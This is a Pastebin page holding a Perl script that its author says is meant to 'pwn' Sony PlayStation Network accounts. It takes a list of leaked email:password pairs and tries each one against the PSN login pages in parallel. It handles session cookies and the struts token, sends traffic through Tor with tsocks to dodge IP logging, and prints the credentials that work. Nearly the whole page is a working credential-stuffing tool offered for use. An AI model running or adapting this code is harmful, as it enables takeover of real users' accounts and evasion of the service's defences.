Guest User

Psn Brute FOrce

a guest
Sep 21st, 2018
66
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. #!/usr/bin/perl
  2. # Used to pwn Sony Playstation Network.  Must have a valid list of psn users emails.
  3. #
  4. # Use at your own risk...
  5. # Must have tsocks and tor installed tested only in linux
  6. # ./psncracker.pl seplistfile 16
  7. # Really just a simple brute force tool designed to accept cookies, manipulate the token
  8. # and use tor as a distributed proxy network aimed at sony's network. You could use any
  9. # randomizing proxy to circumvent the IP logging tho I suppose.
  10.  
  11. # Lists should look like:
  12. #              psnemail@whatever.com:password
  13.  
  14. # Enjoy free games, if you're a fool, cuz sony will have your ass if you get caught using this.
  15.  
  16. # oxagast
  17.  
  18. use Parallel::ForkManager;
  19. use List::Util 'shuffle';
  20. @list2 = `cat @ARGV[0]`;
  21. @list = shuffle(@list2);
  22. @list2 = "";
  23.  
  24. my $pm = new Parallel::ForkManager(@ARGV[1]);
  25. for $cur (0..scalar(@list)-1) {
  26. $pm->start and next;
  27. @emailpass = "";
  28. @emailpass = split(/:/, @list[$cur]);
  29. chomp @emailpass;
  30. system ('tsocks curl --header "User-Agent: Mozilla/5.0" --header "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8" --header "Accept-Language: en-us,en;q=0.5" --header "Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7" "https://account.sonyentertainmentnetwork.com/pc/login.action" --location-trusted --cookie-jar cookies$cur.txt -s > stuff1' . $cur);
  31. system ('cat adtrackercookies.txt3 >> cookies' . $cur . '.txt');
  32. $sys10 = ('tsocks curl --header "Host: account.sonyentertainmentnetwork.com" --header "User-Agent: Mozilla/5.0 (Ubuntu; X11; Linux i686; rv:9.0.1) Gecko/20100101 Firefox/9.0.1" --header "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8" --header "Accept-Language: en-us,en;q=0.5" --header "Accept-Encoding: gzip, deflate" --header "Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7" --header "Connection: keep-alive" "https://account.sonyentertainmentnetwork.com/pc/j_spring_security_check" --cookie cookies' . $cur . '.txt --cookie-jar cookies2' . $cur . '.txt -L --form-string struts.token.name=struts.token --form-string struts.token=$(cat stuff1' . $cur . ' | grep struts.token | grep tvId | cut -b -80 | sed s/^.*value=\"//) --form-string j_username=');
  33. $sys11 = (' --form-string j_password=');
  34. $sys12 = (' --form-string service-entity=np -L -s > stuff2' . $cur);
  35. $sys13 = ('tsocks curl --header "User-Agent: Mozilla/5.0" --header "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8" --header "Accept-Language: en-us,en;q=0.5" --header "Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7" --cookie cookies2' . $cur . '.txt "https://account.sonyentertainmentnetwork.com/pc/cam/devices/device-list.action?&category=" --location-trusted -s > stuff3' . $cur);
  36.  
  37. system("$sys10@emailpass[0]$sys11@emailpass[1]$sys12");
  38. system("$sys13");
  39. unlink("cookies$cur.txt");
  40. unlink("stuff2$cur");
  41. unlink("stuff1$cur");
  42. $lastpage = `cat stuff3$cur`;
  43. unlink("stuff3$cur");
  44. if ($lastpage !~ m/@emailpass[0]/s) {
  45.         print "TESTING: @emailpass[0]:@emailpass[1]\n";
  46. }
  47.  
  48.  
  49. if ($lastpage =~ m/@emailpass[0]/s) {
  50.     print "FOUND: @emailpass[0]:@emailpass[1]\n";
  51. }
  52. $pm->finish;
  53. }
  54. $pm->wait_all_children;
Add Comment
Please, Sign In to add comment